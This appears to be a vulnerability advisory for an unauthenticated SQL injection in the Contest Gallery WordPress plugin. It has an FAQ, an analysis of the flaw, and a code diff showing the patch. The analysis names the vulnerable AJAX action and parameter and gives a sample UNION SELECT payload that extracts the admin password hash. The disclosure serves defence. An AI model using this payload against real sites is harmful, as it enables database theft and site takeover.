What is CVE-2026-8912?

CVE-2026-8912 is a high-severity SQL injection vulnerability found in the Contest Gallery plugin for WordPress, affecting versions up to and including 28.1.6. It allows unauthenticated attackers to exploit the ‘form_input’ parameter in AJAX requests to manipulate SQL queries and potentially extract sensitive information from the database.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization in the ‘post_cg_gallery_form_upload’ AJAX action. User-supplied input is directly concatenated into SQL queries without proper escaping, allowing attackers to inject malicious SQL code through the ‘form_input’ parameter.

Who is affected by this vulnerability?

Any WordPress site using the Contest Gallery plugin version 28.1.6 or earlier is at risk. Administrators can check their plugin version in the WordPress dashboard under the ‘Plugins’ section.

How can I check if my site is vulnerable?

To verify if your site is vulnerable, check the version of the Contest Gallery plugin installed. If it is 28.1.6 or earlier, your site is susceptible to CVE-2026-8912.

What is the recommended fix for this vulnerability?

The immediate fix is to update the Contest Gallery plugin to version 28.1.7 or later, where the vulnerability has been patched. This version includes input validation and sanitization improvements to prevent SQL injection.

What are the risks associated with this vulnerability?

If exploited, this vulnerability allows attackers to execute arbitrary SQL queries, potentially leading to the extraction of sensitive data such as user credentials and personal information. In severe cases, it could result in complete site compromise.

What does a CVSS score of 7.5 mean?

A CVSS score of 7.5 indicates that the vulnerability is classified as high severity. This means it poses a significant risk to affected systems, and immediate action is recommended to mitigate potential exploitation.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can send a crafted POST request to the vulnerable AJAX endpoint, manipulating the ‘form_input’ parameter to inject SQL commands. This demonstrates the ease with which an attacker can exploit the vulnerability to extract database information.

What additional measures can I take to secure my site?

In addition to updating the plugin, consider implementing web application firewalls (WAFs), regularly monitoring logs for suspicious activity, and performing security audits on all installed plugins to ensure they are up to date and secure.

Is the nonce protection effective against this vulnerability?

The nonce used in the AJAX request does not provide effective protection against this vulnerability, as it is publicly accessible in the page source. Attackers can still exploit the SQL injection regardless of nonce validation.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Contest Gallery plugin temporarily to prevent exploitation. Additionally, review server logs for any unusual activity and restrict access to the affected AJAX endpoint.

Where can I find more information about this vulnerability?

More information about CVE-2026-8912 can be found on the official CVE database, security advisories from WordPress, and community discussions on security forums. Staying informed through these resources can help you maintain better security practices.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 18, 2026

CVE-2026-8912: Contest Gallery <= 28.1.6 – Unauthenticated SQL Injection (contest-gallery)

CVE ID CVE-2026-8912

Plugin contest-gallery

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 28.1.6

Patched Version 28.1.7

Disclosed May 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-8912:

This vulnerability allows unauthenticated SQL injection in the Contest Gallery plugin for WordPress, versions up to and including 28.1.6. The flaw exists in the ‘post_cg_gallery_form_upload’ AJAX action, specifically within the users-upload-check.php file, where user-supplied input from the ‘form_input’ parameter is used unsanitized in an SQL query. The vulnerability carries a CVSS score of 7.5 (High).

The root cause is in users-upload-check.php, around line 1027 in the vulnerable version. When processing form fields with types like ‘nf’, ‘ef’, ‘se’, ‘ra’, ‘chk’, ‘url’, ‘sec’, ‘cb’, ‘fbt’, ‘dt’, the code extracts field ID from sequential input without sanitization: $f_input_id = $value;. This value is then concatenated directly into SQL queries, notably at line 1179: SELECT Field_Content FROM $tablename_f_input WHERE id = $f_input_id. The diff shows that in the patched version (28.1.7), the developer added absint() casting and input validation: $f_input_id = absint($value); followed by a check if empty($f_input_id) || !isset($inputFieldContentArray[$f_input_id]).

Exploitation is straightforward. An attacker sends a POST request to /wp-admin/admin-ajax.php with action=post_cg_gallery_form_upload. The AJAX endpoint is gated by a public nonce (‘cg1l_action’ / ‘cg_nonce’) exposed in the HTML source of any public gallery page. By manipulating the form_input parameter to inject SQL, an attacker can extract sensitive database contents. A typical payload would insert UNION SELECT statements into the f_input_id value, such as: 1 UNION SELECT user_pass FROM wp_users WHERE ID=1.

The patch in version 28.1.7 applies multiple security fixes: (1) $f_input_id is cast to integer with absint(), making SQL injection impossible through this vector. (2) The patch validates that the field ID exists in the expected $inputFieldContentArray, preventing manipulation. (3) Several other SQL queries in users-upload-check.php are migrated to use $wpdb->prepare() with parameterized queries instead of direct concatenation, including the critical SELECT Field_Content query at line 1179. (4) Cookie handling in voting files and upload checks now uses the new cg_get_valid_frontend_cookie() function that validates cookie format with a regex pattern, eliminating cookie-based injection vectors.

The impact is severe. An unauthenticated attacker can extract any data from the WordPress database, including user credentials (hashed passwords), email addresses, session tokens, and any custom data stored by other plugins. SQL injection can also lead to complete site compromise if the attacker writes files or creates new admin accounts.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/contest-gallery/functions/general/cg-general-functions.php
+++ b/contest-gallery/functions/general/cg-general-functions.php
@@ -884,6 +884,55 @@
 	}
 }

+if(!function_exists('cg_is_valid_frontend_cookie_value')){
+	function cg_is_valid_frontend_cookie_value($cookieValue){
+		if(!is_string($cookieValue) || $cookieValue === ''){
+			return false;
+		}
+
+		$cookieValue = wp_unslash($cookieValue);
+
+		return (bool) preg_match('/^[a-f0-9]{32}[0-9]{10,}$/', $cookieValue);
+	}
+}
+
+if(!function_exists('cg_get_valid_frontend_cookie')){
+	function cg_get_valid_frontend_cookie($galeryID,$type,$setIfMissing = false){
+		$galeryID = absint($galeryID);
+
+		if(
+			empty($galeryID) ||
+			!in_array($type,array('upload','voting'),true)
+		){
+			return '';
+		}
+
+		$cookieName = 'contest-gal1ery-'.$galeryID.'-'.$type;
+
+		if(!empty($_COOKIE[$cookieName])){
+			$cookieValue = wp_unslash($_COOKIE[$cookieName]);
+
+			if(cg_is_valid_frontend_cookie_value($cookieValue)){
+				return $cookieValue;
+			}
+
+			$cookieValue = cg_set_cookie($galeryID,$type);
+			$_COOKIE[$cookieName] = $cookieValue;
+
+			return $cookieValue;
+		}
+
+		if($setIfMissing){
+			$cookieValue = cg_set_cookie($galeryID,$type);
+			$_COOKIE[$cookieName] = $cookieValue;
+
+			return $cookieValue;
+		}
+
+		return '';
+	}
+}
+
 if(!function_exists('cg_create_contest_gallery_plugin_tag')){
 	function cg_create_contest_gallery_plugin_tag(){

@@ -1282,4 +1331,4 @@
     }
 }

-?>
 No newline at end of file
+?>
--- a/contest-gallery/functions/general/cg-get-version.php
+++ b/contest-gallery/functions/general/cg-get-version.php
@@ -17,7 +17,7 @@
 if(!function_exists('cg_get_version_for_scripts')){
     function cg_get_version_for_scripts () {
         /**###NORMAL###**/
-        return '28.1.6';
+        return '28.1.7';
         /**###NORMAL-END###**/
     }
-}
 No newline at end of file
+}
--- a/contest-gallery/index.php
+++ b/contest-gallery/index.php
@@ -2,7 +2,7 @@
 /*
 Plugin Name: Contest Gallery
 Description: Upload form, files, photos and videos upload contest gallery plugin for WordPress. Create upload forms for entries with or without file/image upload. Create user registration form. Create login form. Create responsive galleries and allow to vote for any kind of entries. Sell entries via PayPal or Stripe API. Create or edit images via OpenAI API.
-Version: 28.1.6
+Version: 28.1.7
 Author: Contest Gallery
 Plugin URI: https://www.contest-gallery.com
 Author URI: https://www.contest-gallery.com
@@ -800,6 +800,54 @@
 $rewriteRulesChangedFilePath = $wp_upload_dir['basedir'].'/contest-gallery/gallery-general/rewrite-rules-changed-do-not-edit-or-remove.txt';
 //file_put_contents($rewriteRulesChangedFilePath,'changed');

+if(!function_exists('cg_is_registered_only_ecommerce_download_privileged_user')){
+    function cg_is_registered_only_ecommerce_download_privileged_user() {
+        if(!is_user_logged_in()){
+            return false;
+        }
+
+        $user = wp_get_current_user();
+
+        return (
+            is_super_admin($user->ID) ||
+            in_array('administrator', (array) $user->roles, true)
+        );
+    }
+}
+
+if(!function_exists('cg_check_registered_only_ecommerce_download_access')){
+    function cg_check_registered_only_ecommerce_download_access($Order, $notAllowedMessage) {
+        global $wpdb;
+
+        if(empty($Order)){
+            return;
+        }
+
+        $tablename_ecommerce_options = $wpdb->prefix . "contest_gal1ery_ecommerce_options";
+        $ecommerceOptions = $wpdb->get_row("SELECT RegUserOrderSummaryOnly FROM $tablename_ecommerce_options WHERE GeneralID = 1");
+
+        if(empty($ecommerceOptions) || empty($ecommerceOptions->RegUserOrderSummaryOnly)){
+            return;
+        }
+
+        if(cg_is_registered_only_ecommerce_download_privileged_user()){
+            return;
+        }
+
+        $WpUserIdOrder = absint($Order->WpUserId);
+        $WpUserIdLoggedIn = get_current_user_id();
+
+        if(
+            !is_user_logged_in() ||
+            empty($WpUserIdOrder) ||
+            empty($WpUserIdLoggedIn) ||
+            $WpUserIdOrder !== $WpUserIdLoggedIn
+        ){
+            echo $notAllowedMessage;die;
+        }
+    }
+}
+

 if(!function_exists('cg_download_invoice')){
     add_action('template_redirect','cg_download_invoice');
@@ -814,6 +862,11 @@
             if(empty($Order)){
                 echo "Order not found to download invoice";die;
             }else{
+                cg_check_registered_only_ecommerce_download_access(
+                    $Order,
+                    'Invoice download not possible. Please log in with the account used for this order.'
+                );
+
                 $wp_upload_dir = wp_upload_dir();
                 $InvoiceFilePath = $Order->InvoiceFilePath;
                 $fileUrl = str_replace('WP_UPLOAD_DIR',$wp_upload_dir['basedir'],$InvoiceFilePath);
@@ -910,11 +963,16 @@
 				echo 'Download not possible';die;
 			}

-			$id = $Order->id;
-			$downloadNotFound = true;
 			if(empty($Order)){
                 echo "Order not found";die;
             }else{
+                cg_check_registered_only_ecommerce_download_access(
+                    $Order,
+                    'Download not possible. Please log in with the account used for this order.'
+                );
+
+				$id = $Order->id;
+				$downloadNotFound = true;
                 $wp_upload_dir = wp_upload_dir();

 				$orderItems = $wpdb->get_results("SELECT * FROM $tablename_ecommerce_orders_items WHERE ParentOrder = '$id' ");
@@ -1023,4 +1081,3 @@
     return $data;
 }*/

-
--- a/contest-gallery/v10/v10-frontend/data/rating/rate-picture-five-star.php
+++ b/contest-gallery/v10/v10-frontend/data/rating/rate-picture-five-star.php
@@ -455,10 +455,10 @@
         }

     }
-
-
+    $CookieId = '';
     if($CheckCookie==1) {
-        if(!isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting'])) {
+        $CookieId = cg_get_valid_frontend_cookie($galeryID,'voting');
+        if(empty($CookieId)) {
             $cookieValue = cg_set_cookie($galeryID,'voting');
             ?>
             <script data-cg-processing="true">
@@ -490,10 +490,6 @@

     $getRatingPicture = 0;
     $countVotesOfUserPerGallery = 0;
-    $CookieId = '';
-    if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting']) && $options['general']['CheckCookie'] == 1) {
-        $CookieId = $_COOKIE['contest-gal1ery-'.$galeryID.'-voting'];
-    }

     // Sowohl Rating mit 5 Sternen wie auch Rating mit 1 Stern sollen von einander getrennt behandelt werden.
     // Deswegen die Abfragen mit if AllowRating ....
@@ -512,7 +508,7 @@
     }
     elseif ($CheckCookie == 1 && $CheckIp!=1)
     {
-        if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting'])) {
+        if(!empty($CookieId)) {

             $getRatingPicture = $wpdb->get_var( $wpdb->prepare(
                 "
@@ -536,7 +532,7 @@
         ) );
     } elseif ($CheckIp == 1 && $CheckCookie == 1){

-        if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting'])) {
+        if(!empty($CookieId)) {

             $getRatingPicture = $wpdb->get_var( $wpdb->prepare(
                 "
@@ -578,7 +574,7 @@
         }
         elseif ($CheckCookie == 1 && $CheckIp!=1)
         {
-            if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting'])) {
+            if(!empty($CookieId)) {
                 $countVotesOfUserPerGallery = $wpdb->get_var( $wpdb->prepare(
                     "
 						SELECT COUNT(*) AS NumberOfRows
@@ -602,7 +598,7 @@

         }
         elseif ($CheckIp == 1 && $CheckCookie==1) {
-            if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting'])) {
+            if(!empty($CookieId)) {
                 $countVotesOfUserPerGallery = $wpdb->get_var( $wpdb->prepare(
                     "
 						SELECT COUNT(*) AS NumberOfRows
@@ -643,7 +639,7 @@
         }
         elseif ($CheckCookie == 1 && $CheckIp!=1)
         {
-            if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting'])) {
+            if(!empty($CookieId)) {
                 $countVotesOfUserPerCategory = $wpdb->get_var( $wpdb->prepare(
                     "
 						SELECT COUNT(*) AS NumberOfRows
@@ -665,7 +661,7 @@
             ) );
         }
         elseif ($CheckIp == 1 && $CheckCookie==1) {
-            if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting'])) {
+            if(!empty($CookieId)) {
                 $countVotesOfUserPerCategory = $wpdb->get_var( $wpdb->prepare(
                     "
 						SELECT COUNT(*) AS NumberOfRows
@@ -715,17 +711,49 @@
             $countUserVotesForImage = $wpdb->get_var( "SELECT COUNT(*) AS NumberOfRows FROM $tablenameIP WHERE Rating >= '1' && WpUserId = '$wpUserId' && GalleryID = '$galeryID' && pid = '$pictureID'" );
         }
      }elseif ($CheckCookie == 1 && $CheckIp != 1){
-        if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting'])) {
-            $lastVotedIpRow = $wpdb->get_row( "SELECT id, Rating FROM $tablenameIP WHERE Rating >= '1' && CookieId = '$CookieId' && GalleryID = '$galeryID' && pid = '$pictureID' ORDER BY id DESC LIMIT 1" );
-            $countUserVotesForImage = $wpdb->get_var( "SELECT COUNT(*) AS NumberOfRows FROM $tablenameIP WHERE Rating >= '1' && CookieId = '$CookieId' && GalleryID = '$galeryID' && pid = '$pictureID'" );
+        if(!empty($CookieId)) {
+            $lastVotedIpRow = $wpdb->get_row($wpdb->prepare(
+                "SELECT id, Rating FROM $tablenameIP WHERE Rating >= %d AND CookieId = %s AND GalleryID = %d AND pid = %d ORDER BY id DESC LIMIT 1",
+                1,
+                $CookieId,
+                $galeryID,
+                $pictureID
+            ));
+            $countUserVotesForImage = $wpdb->get_var($wpdb->prepare(
+                "SELECT COUNT(*) AS NumberOfRows FROM $tablenameIP WHERE Rating >= %d AND CookieId = %s AND GalleryID = %d AND pid = %d",
+                1,
+                $CookieId,
+                $galeryID,
+                $pictureID
+            ));
         }
      } elseif ($CheckIp == 1 && $CheckCookie!=1) {
         $lastVotedIpRow = $wpdb->get_row("SELECT id, Rating FROM $tablenameIP WHERE Rating >= '1' && IP = '$userIP' && GalleryID = '$galeryID' && pid = '$pictureID' ORDER BY id DESC LIMIT 1");
         $countUserVotesForImage = $wpdb->get_var("SELECT COUNT(*) AS NumberOfRows FROM $tablenameIP WHERE Rating >= '1' && IP = '$userIP' && GalleryID = '$galeryID' && pid = '$pictureID'");
     }elseif ($CheckIp == 1 && $CheckCookie==1) {
-        if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting'])) {
-            $lastVotedIpRow = $wpdb->get_row( "SELECT id, Rating FROM $tablenameIP WHERE (Rating >= '1' && IP = '$userIP' && GalleryID = '$galeryID' && pid = '$pictureID') OR (Rating >= '1' && CookieId = '$CookieId' && GalleryID = '$galeryID' && pid = '$pictureID') ORDER BY id DESC LIMIT 1" );
-            $countUserVotesForImage = $wpdb->get_var( "SELECT COUNT(*) AS NumberOfRows FROM $tablenameIP WHERE  (Rating >= '1' && IP = '$userIP' && GalleryID = '$galeryID' && pid = '$pictureID') OR (Rating >= '1' && CookieId = '$CookieId' && GalleryID = '$galeryID' && pid = '$pictureID')" );
+        if(!empty($CookieId)) {
+            $lastVotedIpRow = $wpdb->get_row($wpdb->prepare(
+                "SELECT id, Rating FROM $tablenameIP WHERE (Rating >= %d AND IP = %s AND GalleryID = %d AND pid = %d) OR (Rating >= %d AND CookieId = %s AND GalleryID = %d AND pid = %d) ORDER BY id DESC LIMIT 1",
+                1,
+                $userIP,
+                $galeryID,
+                $pictureID,
+                1,
+                $CookieId,
+                $galeryID,
+                $pictureID
+            ));
+            $countUserVotesForImage = $wpdb->get_var($wpdb->prepare(
+                "SELECT COUNT(*) AS NumberOfRows FROM $tablenameIP WHERE (Rating >= %d AND IP = %s AND GalleryID = %d AND pid = %d) OR (Rating >= %d AND CookieId = %s AND GalleryID = %d AND pid = %d)",
+                1,
+                $userIP,
+                $galeryID,
+                $pictureID,
+                1,
+                $CookieId,
+                $galeryID,
+                $pictureID
+            ));
         } else {
             $lastVotedIpRow = $wpdb->get_row("SELECT id, Rating FROM $tablenameIP WHERE Rating >= '1' && IP = '$userIP' && GalleryID = '$galeryID' && pid = '$pictureID' ORDER BY id DESC LIMIT 1");
             $countUserVotesForImage = $wpdb->get_var("SELECT COUNT(*) AS NumberOfRows FROM $tablenameIP WHERE Rating >= '1' && IP = '$userIP' && GalleryID = '$galeryID' && pid = '$pictureID'");
@@ -843,8 +871,14 @@
             }

         }elseif($CheckCookie){
-            if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting'])) {
-                $VotesUserInTstamp = $wpdb->get_var( "SELECT COUNT(*) FROM $tablenameIP WHERE Tstamp > '$TstampToCompare' && CookieId='$CookieId' && GalleryID = '$galeryID' && Rating>='1'");
+            if(!empty($CookieId)) {
+                $VotesUserInTstamp = $wpdb->get_var($wpdb->prepare(
+                    "SELECT COUNT(*) FROM $tablenameIP WHERE Tstamp > %d AND CookieId = %s AND GalleryID = %d AND Rating >= %d",
+                    $TstampToCompare,
+                    $CookieId,
+                    $galeryID,
+                    1
+                ));
             }
         }else{
             $VotesUserInTstamp = $wpdb->get_var( "SELECT COUNT(*) FROM $tablenameIP WHERE Tstamp > '$TstampToCompare' && IP='$userIP' && GalleryID = '$galeryID' && Rating>='1'");
@@ -1140,4 +1174,4 @@
 }


-?>
 No newline at end of file
+?>
--- a/contest-gallery/v10/v10-frontend/data/rating/rate-picture-one-star.php
+++ b/contest-gallery/v10/v10-frontend/data/rating/rate-picture-one-star.php
@@ -400,10 +400,10 @@
         }

     }
-
-
+    $CookieId = '';
     if($CheckCookie==1) {
-        if(!isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting'])) {
+        $CookieId = cg_get_valid_frontend_cookie($galeryID,'voting');
+        if(empty($CookieId)) {
             $cookieValue = cg_set_cookie($galeryID,'voting');
             ?>
             <script data-cg-processing="true">
@@ -433,11 +433,6 @@

     $getRatingPicture = 0;
     $countVotesOfUserPerGallery = 0;
-    $CookieId = '';
-
-    if(!empty($_COOKIE['contest-gal1ery-'.$galeryID.'-voting']) && $options['general']['CheckCookie'] == 1) {
-        $CookieId = $_COOKIE['contest-gal1ery-'.$galeryID.'-voting'];
-    }

     // Prüfen ob ein bestimmtes Bild von dem User bewertet wurde
     if ($CheckLogin == 1 && $wpUserId>0)
@@ -455,7 +450,7 @@
     }
     elseif ($CheckCookie == 1 && $CheckIp!=1)
     {
-        if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting'])) {
+        if(!empty($CookieId)) {

             $getRatingPicture = $wpdb->get_var( $wpdb->prepare(
                 "
@@ -479,7 +474,7 @@
         ) );
     } elseif ($CheckIp == 1 && $CheckCookie == 1){

-        if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting'])) {
+        if(!empty($CookieId)) {
             $getRatingPicture = $wpdb->get_var( $wpdb->prepare(
                 "
         SELECT COUNT(*) AS NumberOfRows
@@ -519,7 +514,7 @@
         }
         elseif ($CheckCookie == 1 && $CheckIp!=1)
         {
-            if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting'])) {
+            if(!empty($CookieId)) {
                 $countVotesOfUserPerGallery = $wpdb->get_var( $wpdb->prepare(
                     "
                     SELECT COUNT(*) AS NumberOfRows
@@ -542,7 +537,7 @@
         }
         elseif ($CheckIp == 1 && $CheckCookie==1) {

-            if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting'])) {
+            if(!empty($CookieId)) {
                 $countVotesOfUserPerGallery = $wpdb->get_var( $wpdb->prepare(
                     "
                     SELECT COUNT(*) AS NumberOfRows
@@ -586,7 +581,7 @@
         }
         elseif ($CheckCookie == 1 && $CheckIp != 1)
         {
-            if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting'])) {
+            if(!empty($CookieId)) {
                 $countVotesOfUserPerCategory = $wpdb->get_var( $wpdb->prepare(
                     "
                     SELECT COUNT(*) AS NumberOfRows
@@ -608,7 +603,7 @@
             ) );
         }
         elseif ($CheckIp == 1 && $CheckCookie==1) {
-            if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting'])) {
+            if(!empty($CookieId)) {
                 $countVotesOfUserPerCategory = $wpdb->get_var( $wpdb->prepare(
                     "
 						SELECT COUNT(*) AS NumberOfRows
@@ -660,9 +655,21 @@
             }
         }
         elseif ($CheckCookie == 1 && $CheckIp != 1){
-            if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting'])) {
-                $lastVotedIpId = $wpdb->get_var( "SELECT id FROM $tablenameIP WHERE RatingS = '1' && CookieId = '$CookieId' && GalleryID = '$galeryID' && pid = '$pictureID' ORDER BY id DESC LIMIT 1" );
-                $countUserVotesForImage = $wpdb->get_var( "SELECT COUNT(*) AS NumberOfRows FROM $tablenameIP WHERE RatingS = '1' && CookieId = '$CookieId' && GalleryID = '$galeryID' && pid = '$pictureID'" );
+            if(!empty($CookieId)) {
+                $lastVotedIpId = $wpdb->get_var($wpdb->prepare(
+                    "SELECT id FROM $tablenameIP WHERE RatingS = %d AND CookieId = %s AND GalleryID = %d AND pid = %d ORDER BY id DESC LIMIT 1",
+                    1,
+                    $CookieId,
+                    $galeryID,
+                    $pictureID
+                ));
+                $countUserVotesForImage = $wpdb->get_var($wpdb->prepare(
+                    "SELECT COUNT(*) AS NumberOfRows FROM $tablenameIP WHERE RatingS = %d AND CookieId = %s AND GalleryID = %d AND pid = %d",
+                    1,
+                    $CookieId,
+                    $galeryID,
+                    $pictureID
+                ));
             }
         }
         elseif ($CheckIp == 1 && $CheckCookie!=1) {
@@ -670,9 +677,29 @@
             $countUserVotesForImage = $wpdb->get_var( "SELECT COUNT(*) AS NumberOfRows FROM $tablenameIP WHERE RatingS = '1' && IP = '$userIP' && GalleryID = '$galeryID' && pid = '$pictureID'" );
         }
         elseif ($CheckIp == 1 && $CheckCookie==1) {
-            if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting'])) {
-                $lastVotedIpId = $wpdb->get_var( "SELECT id FROM $tablenameIP WHERE  (RatingS = '1' && IP = '$userIP' && GalleryID = '$galeryID' && pid = '$pictureID') OR (RatingS = '1' && CookieId = '$CookieId' && GalleryID = '$galeryID' && pid = '$pictureID') ORDER BY id DESC LIMIT 1" );
-                $countUserVotesForImage = $wpdb->get_var( "SELECT COUNT(*) AS NumberOfRows FROM $tablenameIP WHERE (RatingS = '1' && IP = '$userIP' && GalleryID = '$galeryID' && pid = '$pictureID') OR (RatingS = '1' && CookieId = '$CookieId' && GalleryID = '$galeryID' && pid = '$pictureID')" );
+            if(!empty($CookieId)) {
+                $lastVotedIpId = $wpdb->get_var($wpdb->prepare(
+                    "SELECT id FROM $tablenameIP WHERE (RatingS = %d AND IP = %s AND GalleryID = %d AND pid = %d) OR (RatingS = %d AND CookieId = %s AND GalleryID = %d AND pid = %d) ORDER BY id DESC LIMIT 1",
+                    1,
+                    $userIP,
+                    $galeryID,
+                    $pictureID,
+                    1,
+                    $CookieId,
+                    $galeryID,
+                    $pictureID
+                ));
+                $countUserVotesForImage = $wpdb->get_var($wpdb->prepare(
+                    "SELECT COUNT(*) AS NumberOfRows FROM $tablenameIP WHERE (RatingS = %d AND IP = %s AND GalleryID = %d AND pid = %d) OR (RatingS = %d AND CookieId = %s AND GalleryID = %d AND pid = %d)",
+                    1,
+                    $userIP,
+                    $galeryID,
+                    $pictureID,
+                    1,
+                    $CookieId,
+                    $galeryID,
+                    $pictureID
+                ));
             }else{
                 $lastVotedIpId = $wpdb->get_var( "SELECT id FROM $tablenameIP WHERE RatingS = '1' && IP = '$userIP' && GalleryID = '$galeryID' && pid = '$pictureID' ORDER BY id DESC LIMIT 1" );
                 $countUserVotesForImage = $wpdb->get_var( "SELECT COUNT(*) AS NumberOfRows FROM $tablenameIP WHERE RatingS = '1' && IP = '$userIP' && GalleryID = '$galeryID' && pid = '$pictureID'" );
@@ -758,8 +785,14 @@
             }
         }
         elseif($CheckCookie){
-            if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-voting'])) {
-                $VotesUserInTstamp = $wpdb->get_var( "SELECT COUNT(*) FROM $tablenameIP WHERE Tstamp > '$TstampToCompare' && CookieId='$CookieId' && GalleryID = '$galeryID' && RatingS='1'");
+            if(!empty($CookieId)) {
+                $VotesUserInTstamp = $wpdb->get_var($wpdb->prepare(
+                    "SELECT COUNT(*) FROM $tablenameIP WHERE Tstamp > %d AND CookieId = %s AND GalleryID = %d AND RatingS = %d",
+                    $TstampToCompare,
+                    $CookieId,
+                    $galeryID,
+                    1
+                ));
             }
         }else{
             $VotesUserInTstamp = $wpdb->get_var( "SELECT COUNT(*) FROM $tablenameIP WHERE Tstamp > '$TstampToCompare' && IP='$userIP' && GalleryID = '$galeryID' && RatingS='1'");
@@ -1013,4 +1046,4 @@
 }


-?>
 No newline at end of file
+?>
--- a/contest-gallery/v10/v10-frontend/load-data-ajax.php
+++ b/contest-gallery/v10/v10-frontend/load-data-ajax.php
@@ -237,11 +237,14 @@
     if($options['pro']['RegUserUploadOnly']==1 && !empty($options['pro']['RegUserMaxUpload']) && is_user_logged_in()==true){
         $UploadedUserFilesAmount = $wpdb->get_var("SELECT COUNT(*) FROM $tablename WHERE WpUserId = '$WpUserId' and GalleryID = '$galeryID'");
     }elseif($options['pro']['RegUserUploadOnly']==2 && !empty($options['pro']['RegUserMaxUpload'])){
-        if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-upload'])) {
-            $CookieId = $_COOKIE['contest-gal1ery-'.$galeryID.'-upload'];
-            $UploadedUserFilesAmount = $wpdb->get_var("SELECT COUNT(*) FROM $tablename WHERE CookieId = '$CookieId' and GalleryID = '$galeryID'");
+        $CookieId = cg_get_valid_frontend_cookie($galeryID,'upload',true);
+        if(!empty($CookieId)){
+            $UploadedUserFilesAmount = $wpdb->get_var($wpdb->prepare(
+                "SELECT COUNT(*) FROM $tablename WHERE CookieId = %s and GalleryID = %d",
+                $CookieId,
+                $galeryID
+            ));
         }else{
-            $CookieId = "up".(md5(time().uniqid('cg',true)).time());
             $UploadedUserFilesAmount = 0;
         }
     }elseif($options['pro']['RegUserUploadOnly']==3 && !empty($options['pro']['RegUserMaxUpload'])){
@@ -250,11 +253,14 @@
     if($options['pro']['RegUserUploadOnly']==1 && !empty($options['pro']['RegUserMaxUploadPerCategory']) && is_user_logged_in()==true){
         $UploadedUserFilesAmountPerCategories = $wpdb->get_results("SELECT Category FROM $tablename WHERE WpUserId = '$WpUserId' and GalleryID = '$galeryID'");
     }elseif($options['pro']['RegUserUploadOnly']==2 && !empty($options['pro']['RegUserMaxUploadPerCategory'])){
-        if(isset($_COOKIE['contest-gal1ery-'.$galeryID.'-upload'])) {
-            $CookieId = $_COOKIE['contest-gal1ery-'.$galeryID.'-upload'];
-            $UploadedUserFilesAmountPerCategories = $wpdb->get_results("SELECT Category FROM $tablename WHERE CookieId = '$CookieId' and GalleryID = '$galeryID'");
+        $CookieId = cg_get_valid_frontend_cookie($galeryID,'upload',true);
+        if(!empty($CookieId)){
+            $UploadedUserFilesAmountPerCategories = $wpdb->get_results($wpdb->prepare(
+                "SELECT Category FROM $tablename WHERE CookieId = %s and GalleryID = %d",
+                $CookieId,
+                $galeryID
+            ));
         }else{
-            $CookieId = "up".(md5(time().uniqid('cg',true)).time());
             $UploadedUserFilesAmountPerCategories = null;
         }
     }elseif($options['pro']['RegUserUploadOnly']==3 && !empty($options['pro']['RegUserMaxUploadPerCategory'])){
@@ -1092,4 +1098,3 @@

 ?>

-
--- a/contest-gallery/v10/v10-frontend/user_upload/users-upload-check.php
+++ b/contest-gallery/v10/v10-frontend/user_upload/users-upload-check.php
@@ -187,8 +187,9 @@
         }elseif($RegUserUploadOnly==2 && !empty($RegUserMaxUpload)){

             if($RegUserUploadOnly==2){
+                $CookieId = cg_get_valid_frontend_cookie($galeryID,'upload');

-                if(!isset($_COOKIE['contest-gal1ery-'.$galeryID.'-upload'])) {
+                if(empty($CookieId)) {

                     echo $UploadRequiresCookieMessage;

@@ -205,16 +206,17 @@

                     <?php
                     die;
-
-                }else{
-                    $CookieId = $_COOKIE['contest-gal1ery-'.$galeryID.'-upload'];
                 }

             }

             $isCountCheckHasToBeDone = true;
             if(!empty($CookieId)){
-                $regUserUploadsCount = $wpdb->get_var("SELECT COUNT(*) FROM $tablename1 WHERE CookieId = '$CookieId' and GalleryID = '$galeryID'");
+                $regUserUploadsCount = $wpdb->get_var($wpdb->prepare(
+                    "SELECT COUNT(*) FROM $tablename1 WHERE CookieId = %s and GalleryID = %d",
+                    $CookieId,
+                    $galeryID
+                ));
             }else{
                 $regUserUploadsCount = 0;
             }
@@ -420,7 +422,27 @@

         if($i == 2){

-            $inputId = $value;
+            $inputId = absint($value);
+
+            if(empty($inputId) || !isset($inputFieldContentArray[$inputId])){
+
+                ?>
+
+                <script data-cg-processing="true">
+
+
+                    var gid = <?php echo json_encode($galeryIDuser);?>;
+                    cgJsData[gid].vars.upload.doneUploadFailed = true;
+                    cgJsData[gid].vars.upload.failMessage = <?php echo json_encode("Please don't manipulate the form. Field_Type: $fieldType , field id manipulated");?>;
+
+
+                </script>
+
+                <?php
+
+                echo "Please don't manipulate the form. Field_Type: $fieldType , field id manipulated";die;
+
+            }

         }

@@ -1022,7 +1044,13 @@

                             if ($i==1 AND ($ft!='kf' or $ft!='fbd')){$ft = $value; continue;}

